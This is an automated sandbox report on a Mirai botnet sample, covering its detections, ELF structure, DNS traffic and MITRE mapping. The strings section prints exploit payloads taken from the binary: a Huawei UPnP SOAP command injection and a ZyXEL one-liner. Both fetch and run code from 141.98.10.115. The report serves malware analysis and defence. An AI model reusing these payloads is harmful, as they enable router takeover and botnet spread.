Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
UnHAnaAW.spc.elf

Overview

General Information

Sample name:UnHAnaAW.spc.elf
Analysis ID:1588059
MD5:90388b1d55a1df6ad3ebf47156bd8b3e
SHA1:6be035339f5efc43b87f16dac8803e575c6f3f20
SHA256:1d623b74f4b6b6fc57a6aaa12dcd689c411c9de3414eb171c2c3516a167519d1
Tags:elfMiraiuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588059
Start date and time:2025-01-10 21:06:33 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:UnHAnaAW.spc.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@2/0

Warnings

  • VT rate limit hit for: http://141.98.10.115/bins/x86
  • VT rate limit hit for: http://141.98.10.115/zyxel.sh;

Runtime Messages

Command:/tmp/UnHAnaAW.spc.elf
PID:5612
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • UnHAnaAW.spc.elf (PID: 5612, Parent: 5409, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/UnHAnaAW.spc.elf
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
UnHAnaAW.spc.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5612.1.00007f89c0011000.00007f89c0025000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Process Memory Space: UnHAnaAW.spc.elf PID: 5612JoeSecurity_Mirai_6Yara detected MiraiJoe Security

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: UnHAnaAW.spc.elfAvira: detected
        Multi AV Scanner detection for submitted file
        Source: UnHAnaAW.spc.elfReversingLabs: Detection: 65%
        Source: UnHAnaAW.spc.elfVirustotal: Detection: 63%Perma Link
        Source: /tmp/UnHAnaAW.spc.elf (PID: 5612)Socket: 127.0.0.1:23455Jump to behavior
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: UnHAnaAW.spc.elfString found in binary or memory: http://141.98.10.115/bins/x86
        Source: UnHAnaAW.spc.elfString found in binary or memory: http://141.98.10.115/zyxel.sh;
        Source: UnHAnaAW.spc.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: UnHAnaAW.spc.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.115 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://141.98.10.115/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal64.troj.linELF@0/0@2/0
        Source: /tmp/UnHAnaAW.spc.elf (PID: 5612)Queries kernel information via 'uname': Jump to behavior
        Source: UnHAnaAW.spc.elf, 5612.1.000055bd4da7b000.000055bd4dae0000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
        Source: UnHAnaAW.spc.elf, 5612.1.000055bd4da7b000.000055bd4dae0000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/sparc
        Source: UnHAnaAW.spc.elf, 5612.1.00007ffc31edd000.00007ffc31efe000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
        Source: UnHAnaAW.spc.elf, 5612.1.00007ffc31edd000.00007ffc31efe000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/UnHAnaAW.spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/UnHAnaAW.spc.elf

        Stealing of Sensitive Information

        barindex
        Yara detected Mirai
        Source: Yara matchFile source: UnHAnaAW.spc.elf, type: SAMPLE
        Source: Yara matchFile source: 5612.1.00007f89c0011000.00007f89c0025000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: UnHAnaAW.spc.elf PID: 5612, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Mirai
        Source: Yara matchFile source: UnHAnaAW.spc.elf, type: SAMPLE
        Source: Yara matchFile source: 5612.1.00007f89c0011000.00007f89c0025000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: UnHAnaAW.spc.elf PID: 5612, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
        Security Software Discovery        		Remote ServicesData from Local System1
        Non-Application Layer Protocol        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service

        Malware Configuration

        No configs have been found

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        UnHAnaAW.spc.elf66%ReversingLabsLinux.Backdoor.Mirai
        UnHAnaAW.spc.elf63%VirustotalBrowse
        UnHAnaAW.spc.elf100%AviraEXP/ELF.Mirai.Bootnet.o

        Dropped Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        		162.213.35.25
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://141.98.10.115/bins/x86UnHAnaAW.spc.elffalse
            		unknown
            http://141.98.10.115/zyxel.sh;UnHAnaAW.spc.elffalse
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/UnHAnaAW.spc.elffalse
                		high
                http://schemas.xmlsoap.org/soap/envelope/UnHAnaAW.spc.elffalse
                  		high

                  World Map of Contacted IPs

                  No contacted IP infos

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  daisy.ubuntu.comUnHAnaAW.arm6.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  UnHAnaAW.x86.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  UnHAnaAW.arm5.elfGet hashmaliciousUnknownBrowse
                  • 162.213.35.25
                  UnHAnaAW.ppc.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  UnHAnaAW.arm.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  woega6.elfGet hashmaliciousUnknownBrowse
                  • 162.213.35.24
                  ssc.elfGet hashmaliciousGafgytBrowse
                  • 162.213.35.24
                  frosty.arm5.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  frosty.arm6.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  frosty.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):6.115334252833944
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:UnHAnaAW.spc.elf
                  File size:80'888 bytes
                  MD5:90388b1d55a1df6ad3ebf47156bd8b3e
                  SHA1:6be035339f5efc43b87f16dac8803e575c6f3f20
                  SHA256:1d623b74f4b6b6fc57a6aaa12dcd689c411c9de3414eb171c2c3516a167519d1
                  SHA512:a34dd41b057c1241ba3be1f0d772dc4fc087154e2edbe2322419c86cb6b1123b54017407a98ff17f43ae66a2dba075e4a944d637a30f69779b447e1d4d685885
                  SSDEEP:1536:7YUuuEe2XXnSnIFpZu4UAF3QnWzpRuNKUq1et03jRIh4PhnrCnSjXsgpJOsLv0rM:8UuuEe2XXnSnIFpZu4UAF3QnWz7d57sw
                  TLSH:E2835B3269792E16C0D4A47E12F74758B2E21B8E29E8C65E7D730E0FFF506506413AF9
                  File Content Preview:.ELF...........................4..:h.....4. ...(......................7...7...............7...7...7....4...d........dt.Q................................@..(....@.J.................#.....b(..`.....!..... ...@.....".........`......$ ... ...@...........`....

                  Static ELF Info

                  ELF header

                  Class:ELF32
                  Data:2's complement, big endian
                  Version:1 (current)
                  Machine:Sparc
                  Version Number:0x1
                  Type:EXEC (Executable file)
                  OS/ABI:UNIX - System V
                  ABI Version:0
                  Entry Point Address:0x101a4
                  Flags:0x0
                  ELF Header Size:52
                  Program Header Offset:52
                  Program Header Size:32
                  Number of Program Headers:3
                  Section Header Offset:80488
                  Section Header Size:40
                  Number of Section Headers:10
                  Header String Table Index:9

                  Sections

                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x100940x940x1c0x00x6AX004
                  .textPROGBITS0x100b00xb00x12b740x00x6AX004
                  .finiPROGBITS0x22c240x12c240x140x00x6AX004
                  .rodataPROGBITS0x22c380x12c380xbb80x00x2A008
                  .ctorsPROGBITS0x337f40x137f40x80x00x3WA004
                  .dtorsPROGBITS0x337fc0x137fc0x80x00x3WA004
                  .dataPROGBITS0x338080x138080x2200x00x3WA008
                  .bssNOBITS0x33a280x13a280x3300x00x3WA008
                  .shstrtabSTRTAB0x00x13a280x3e0x00x0001

                  Program Segments

                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x100000x100000x137f00x137f06.13340x5R E0x10000.init .text .fini .rodata
                  LOAD0x137f40x337f40x337f40x2340x5642.92400x6RW 0x10000.ctors .dtors .data .bss
                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 10, 2025 21:07:38.250144958 CET5252053192.168.2.131.1.1.1
                  Jan 10, 2025 21:07:38.250196934 CET5416453192.168.2.131.1.1.1
                  Jan 10, 2025 21:07:38.256865978 CET53525201.1.1.1192.168.2.13
                  Jan 10, 2025 21:07:38.257361889 CET53541641.1.1.1192.168.2.13

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 10, 2025 21:07:38.250144958 CET192.168.2.131.1.1.10xabbbStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                  Jan 10, 2025 21:07:38.250196934 CET192.168.2.131.1.1.10x4287Standard query (0)daisy.ubuntu.com28IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 10, 2025 21:07:38.256865978 CET1.1.1.1192.168.2.130xabbbNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                  Jan 10, 2025 21:07:38.256865978 CET1.1.1.1192.168.2.130xabbbNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                  System Behavior

                  General

                  Start time (UTC):20:07:35
                  Start date (UTC):10/01/2025
                  Path:/tmp/UnHAnaAW.spc.elf
                  Arguments:/tmp/UnHAnaAW.spc.elf
                  File size:4379400 bytes
                  MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                  Chronological Activities